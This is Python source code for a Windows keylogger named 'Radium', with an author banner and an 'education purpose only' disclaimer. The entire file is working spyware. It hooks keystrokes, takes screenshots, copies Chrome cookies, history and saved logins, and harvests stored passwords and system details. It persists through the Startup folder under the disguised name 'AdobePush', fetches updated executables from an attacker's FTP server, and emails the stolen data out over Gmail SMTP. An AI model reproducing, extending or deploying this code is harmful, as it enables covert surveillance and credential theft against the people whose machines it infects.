""" ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ _____ _ _ _ _ | __ \ | (_) | | | | | |__) |__ _ __| |_ _ _ _ __ ___ | | _____ _ _| | ___ __ _ __ _ ___ _ __ | _ // _` |/ _` | | | | | '_ ` _ \ | |/ / _ \ | | | |/ _ \ / _` |/ _` |/ _ \ '__| | | \ \ (_| | (_| | | |_| | | | | | | | < __/ |_| | | (_) | (_| | (_| | __/ | |_| \_\__,_|\__,_|_|\__,_|_| |_| |_| |_|\_\___|\__, |_|\___/ \__, |\__, |\___|_| __/ | __/ | __/ | |___/ |___/ |___/ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ --> Coded by: Mehul Jain(mehulj94@gmail.com) --> Github: https://github.com/mehulj94 --> Twitter: https://twitter.com/wayfarermj --> For windows only *For education purpose only. """ #Imported libraries import os import errno import socket import base64 import pyHook import shutil import signal import smtplib import urllib2 import getpass import logging import platform import win32api import pythoncom import subprocess import datetime from ftplib import FTP from PIL import ImageGrab from email import Encoders from Recoveries import Test from contextlib import closing from email.MIMEBase import MIMEBase from email.MIMEText import MIMEText from email.MIMEMultipart import MIMEMultipart #----------------------- ip = base64.b64decode("") #IP to connect to FTP server ftpkey = base64.b64decode("") #FTP password ftpuser = base64.b64decode("") #FTP username passkey = base64.b64decode("") #Password to connect to GMAIL smtp server userkey = base64.b64decode("") #Username to connect to GMAIL smtp server #----------------------- buffer = '' count_scr = 0 count_letter = 0 count_scremail = 0 check_count = 1234 SMTP_SERVER = "smtp.gmail.com" #SMTP server address #----------------------- filematch = 'ABCD.exe' #This name should be equal to exe that you'll upload in FTP folder. The current exe will update to this file #----------------------- directory = "/Radium" #The updated exe should reside in /Radium directory in FTP server current_system_time = datetime.datetime.now() #Get current system time #In this keylogger a folder "Intel" is made in C:\Users\Public\ #The keystrokes are saved in Logs folder by the name of IntelRST.txt #Screenshots are saved in a folder inside Logs #10 Screenshots are sent at a time and are moved to "ToZipScreenshots" for zipping them and send as attachment path = "C:\Users\Public\Intel\Logs" path_to_screenshot = "C:\Users\Public\Intel\Logs\Screenshots" #Screenshots are saved in this folder path_to_cookies = "C:\Users\Public\Intel\Logs" #Cookies will be moved to this folder dir_zip = "C:\Users\Public\Intel\Logs\ToZipScreenshots" #This folder will contain 10 screenshots and will zipped and sent as attachment file_log = 'C:\Users\Public\Intel\Logs\IntelRST.txt' #Contains keystrokes currentdir = os.getcwd() #Get current working directory currentuser = getpass.getuser() #Get current User try: ip_address = socket.gethostbyname(socket.gethostname()) #Get Ip address except: pass try: os.makedirs(path) os.makedirs(dir_zip) os.makedirs(path_to_screenshot) except OSError as exception: if exception.errno != errno.EEXIST: raise #Function to check if the computer is connected to Internet def internet_on(): try: response = urllib2.urlopen('https://www.google.co.in', timeout=20) return True except urllib2.URLError as err: pass return False def subprocess_args(include_stdout=True): if hasattr(subprocess, 'STARTUPINFO'): si = subprocess.STARTUPINFO() si.dwFlags |= subprocess.STARTF_USESHOWWINDOW env = os.environ else: si = None env = None if include_stdout: ret = {'stdout:': subprocess.PIPE} else: ret = {} ret.update({'stdin': subprocess.PIPE, 'stderr': subprocess.PIPE, 'startupinfo': si, 'env': env }) return ret #Function to get the Process ID def getpid(process_name): return [item.split()[1] for item in os.popen('tasklist').read().splitlines()[4:] if process_name in item.split()] #Function to get the Public IP def getpublicip(): try: return urllib2.urlopen('http://ip.42.pl/raw').read() except: pass #Function to get the System information def getsysinfo(): return platform.uname() #Function to get the output of command ipconfig /all def getipcnfg(): try: ipcfg_file = 'C:\Users\Public\Intel\Logs\ipcfg.txt' f = open(ipcfg_file, "w") f.write(subprocess.check_output(["ipconfig", "/all"], **subprocess_args(False))) f.close() except Exception as e: print e #Function to get save passwords from browsers, ftp clients and other programs def getpasswords(): passwords = Test.Result() return str(passwords.run()) #Function to combine all the slave information and save in the info.txt file def getslaveinfo(): slave_info = 'C:\Users\Public\Intel\Logs\info.txt' open_slave_info = open(slave_info, "w") try: open_slave_info.write(getpasswords() + "\n") except Exception as e: print e open_slave_info.write("\n------------------------------\n") try: open_slave_info.write(getpublicip() + "\n") except Exception as e: print e open_slave_info.write("\n------------------------------\n") try: open_slave_info.write(' '.join(str(s) for s in getsysinfo()) + '\n') except Exception as e: print e open_slave_info.close() #Function to delete the old exe after updating the current exe in slave pc def deleteoldstub(): checkfilename = 'AdobePush.exe' #The exe in the startup will be saved by the name of AdobePush. When the exe will be updated the old exe will be deleted. checkdir = 'C://Users//' + currentuser + '//AppData//Roaming//Microsoft//Windows//Start Menu//Programs//Startup//' dircontent = os.listdir(checkdir) try: try: pids = getpid('AdobePush.exe') for id in pids: os.kill(int(id), signal.SIGTERM) except Exception as e: print e if checkfilename in dircontent: os.remove(checkdir + checkfilename) except Exception as e: print e #Function to copy the exe to startup def copytostartup(): try: #----------------------- originalfilename = "Radiumkeylogger.py" #This name should be equal to the name of exe/py that you create. Currently the name of this file is Radiumkeylogger.py #----------------------- #----------------------- coppiedfilename = 'AdobePush.py' #The file will be copied to startup folder by this name #----------------------- copytodir = 'C://Users//' + currentuser + '//AppData//Roaming//Microsoft//Windows//Start Menu//Programs//Startup//' copyfromdir = currentdir + "\\" + originalfilename filesindir = os.listdir(copytodir) if coppiedfilename not in filesindir: try: shutil.copy2(copyfromdir, copytodir + coppiedfilename) except Exception as e: print e except Exception as e: print e return True #Function to list directories content upto 3 level def DriveTree(): file_dir1 = 'C:\Users\Public\Intel\Logs\Dir_View.txt' #The drive hierarchy will be saved in this file drives = win32api.GetLogicalDriveStrings() drives = drives.split('\000')[:-1] no_of_drives = len(drives) file_dir_O = open(file_dir1, "w") for d in range(no_of_drives): try: file_dir_O.write(str(drives[d]) + "\n") directories = os.walk(drives[d]) next_dir = next(directories) next_directories = next_dir[1] next_files = next_dir[2] next_final_dir = next_directories + next_files for nd in next_final_dir: file_dir_O.write(" " + str(nd) + "\n") try: sub_directories = os.walk(drives[d] + nd) next_sub_dir = next(sub_directories)[1] next_sub_sub_file = next(sub_directories)[2] next_final_final_dir = next_sub_dir + next_sub_sub_file for nsd in next_final_final_dir: file_dir_O.write(" " + str(nsd) + "\n") try: sub_sub_directories = os.walk(drives[d] + nd + '\\' + nsd) next_sub_sub_dir = next(sub_sub_directories)[1] next_sub_sub_sub_file = next(sub_sub_directories)[2] next_final_final_final_dir = next_sub_sub_dir + next_sub_sub_sub_file for nssd in next_final_final_final_dir: file_dir_O.write(" " + str(nssd) + "\n") except Exception as e: pass except Exception as e: pass except Exception as e: pass file_dir_O.close() return True #Function to send the data i.e. info.txt, chrome data, login data, screenshots def sendData(fname, fext): attach = "C:\Users\Public\Intel\Logs" + '\\' + fname + fext ts = current_system_time.strftime("%Y%m%d-%H%M%S") SERVER = SMTP_SERVER PORT = 465 USER = userkey PASS = passkey FROM = USER TO = userkey SUBJECT = "Attachment " + "From --> " + currentuser + " Time --> " + str(ts) TEXT = "This attachment is sent from python" + '\n\nUSER : ' + currentuser + '\nIP address : ' + ip_address message = MIMEMultipart() message['From'] = FROM message['To'] = TO message['Subject'] = SUBJECT message.attach(MIMEText(TEXT)) part = MIMEBase('application', 'octet-stream') part.set_payload(open(attach, 'rb').read()) Encoders.encode_base64(part) part.add_header('Content-Disposition', 'attachment; filename="%s"' % os.path.basename(attach)) message.attach(part) try: server = smtplib.SMTP_SSL() server.connect(SERVER, PORT) server.ehlo() server.login(USER, PASS) server.sendmail(FROM, TO, message.as_string()) server.close() except Exception as e: print e return True #Fucntion to steal chrome cookies def cookiestealer(): cookiepath = os.environ.get('HOMEDRIVE') + os.environ.get('HOMEPATH') + '\AppData\Local\Google\Chrome\User Data\Default' cookiefile = 'Cookies' historyfile = 'History' LoginDatafile = "Login Data" copycookie = cookiepath + "\\" + cookiefile copyhistory = cookiepath + "\\" + historyfile copyLoginData = cookiepath + "\\" + LoginDatafile filesindir = os.listdir(path_to_cookies) if copycookie not in filesindir: try: shutil.copy2(copycookie, path_to_cookies) except: pass if copyhistory not in filesindir: try: shutil.copy2(copyhistory, path_to_cookies) except: pass if copyLoginData not in filesindir: try: shutil.copy2(copyLoginData, path_to_cookies) except: pass return True #Function to move all the files that are to be sent via email to one place def MoveAttachments(f_name): arch_name = "C:\Users\Public\Intel\Logs\\" + f_name if f_name == 'Screenshots': files = os.listdir(arch_name) try: for i in range(10): try: shutil.move(arch_name + "\\" + files[i], dir_zip) except Exception as e: print e except Exception as e: print e else: try: shutil.move(arch_name, dir_zip) except Exception as e: print e #Function to zip the files def ZipAttachments(f_name): arch_name = "C:\Users\Public\Intel\Logs\\" + f_name + "Attachments" files = os.listdir(dir_zip) try: shutil.make_archive(arch_name, 'zip', dir_zip) except Exception as e: pass for j in range(len(files)): try: os.remove(dir_zip + "\\" + files[j]) except Exception as e: print e #Function to take screenshot def TakeScreenShot(): ts = current_system_time.strftime("%Y%m%d-%H%M%S") try: scrimg = ImageGrab.grab() scrimg.save(path_to_screenshot + '\\' + str(ts) + '.png') except Exception as e: print e return True #Function to upgrade the exe via ftp def ftpupdate(): try: chtodir = 'C://Users//' + currentuser + '//AppData//Roaming//Microsoft//Windows//Start Menu//Programs//Startup//' try: os.chdir(chtodir) except Exception as e: print e ftp = FTP(ip) ftp.login(ftpuser, ftpkey) ftp.cwd(directory) for filename in ftp.nlst(filematch): fhandle = open(filename, 'wb') ftp.retrbinary('RETR ' + filename, fhandle.write) fhandle.close() if filematch in os.listdir(chtodir): deleteoldstub() except Exception as e: print e return True #Function to send key strokes via email def email(): log_text = open(file_log, "rb") logtext = log_text.readlines() len_logtext = len(logtext) data = "" if internet_on() == True: for i in range(len_logtext): data = data + logtext[i] ts = current_system_time.strftime("%Y%m%d-%H%M%S") SERVER = SMTP_SERVER PORT = 465 USER = userkey PASS = passkey FROM = USER TO = [userkey] SUBJECT = "Keylogger data " + "from --> " + currentuser + " Time --> " + str(ts) MESSAGE = data + '\n\nUSER : ' + currentuser + '\nIP address : ' + ip_address message = """\ From: %s To: %s Subject: %s %s """ % (FROM, ", ".join(TO), SUBJECT, MESSAGE) try: server = smtplib.SMTP_SSL() server.connect(SERVER, PORT) server.ehlo() server.login(USER, PASS) server.sendmail(FROM, TO, message) data = '' server.close() log_text = open(file_log, 'w') log_text.close() except Exception as e: print e return True #Catching the key strokes and emailing them def OnKeyboardEvent(event): global count_letter global count_scr global count_scremail global buffer logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s') if event.Ascii == 13: buffer = current_system_time.strftime("%d/%m/%Y-%H|%M|%S") + ": " + buffer logging.log(10, buffer) buffer = '' count_letter = count_letter + 1 count_scr = count_scr + 1 elif event.Ascii == 8: buffer = buffer[:-1] count_letter = count_letter + 1 count_scr = count_scr + 1 elif event.Ascii == 9: keys = '\t' buffer = buffer + keys count_letter = count_letter + 1 count_scr = count_scr + 1 elif event.Ascii >= 32 and event.Ascii <= 127: keys = chr(event.Ascii) buffer = buffer + keys count_letter = count_letter + 1 count_scr = count_scr + 1 if count_letter == 300: count_letter = 0 email() #Keystrokes will be emailed after every 300 key strokes if count_scr == 500: count_scr = 0 TakeScreenShot() #Screenshot will be taken after 500 key strokes count_scremail += 1 if count_scremail == 10: count_scremail = 0 MoveAttachments('Screenshots') ZipAttachments('Screenshots') sendData('ScreenshotsAttachments', '.zip') #Screenshots will be emailed 10 at a time return True try: copytostartup() #Copying the file to startup except Exception as e: print e if internet_on() == True: #If internet is On try: if check_count == 1234: check_count = 0 #Checking and updating the exe via ftp try: ftpupdate() except Exception as e: print e #Sending the attachments Directory tree, History, Login Data, Cookies, IP config and save passwords files_in_dir = os.listdir(path) if "DHLCiAttachments.zip" not in files_in_dir: DriveTree() try: cookiestealer() except Exception as e: print e getipcnfg() getslaveinfo() #Moving the attachment before zipping them and send try: MoveAttachments('Dir_View.txt') MoveAttachments('History') MoveAttachments('Login Data') MoveAttachments('Cookies') MoveAttachments('ipcfg.txt') MoveAttachments('info.txt') except Exception as e: print e #Zipping the files ZipAttachments('DHLCi') #Sending the zip file sendData("DHLCiAttachments", ".zip") ts = current_system_time.strftime("%Y%m%d-%H%M%S") SERVER = SMTP_SERVER PORT = 465 USER = userkey PASS = passkey FROM = USER TO = [userkey] SUBJECT = currentuser + ' : Slave is connected ' MESSAGE = 'IP Address ---> ' + ip_address + '\nTime --> ' + str(ts) message = """\ From: %s To: %s Subject: %s %s """ % (FROM, ", ".join(TO), SUBJECT, MESSAGE) try: server = smtplib.SMTP_SSL() server.connect(SERVER, PORT) server.ehlo() server.login(USER, PASS) server.sendmail(FROM, TO, message) data = '' server.close() except Exception as e: print e except Exception as e: print e hooks_manager = pyHook.HookManager() hooks_manager.KeyDown = OnKeyboardEvent hooks_manager.HookKeyboard() pythoncom.PumpMessages()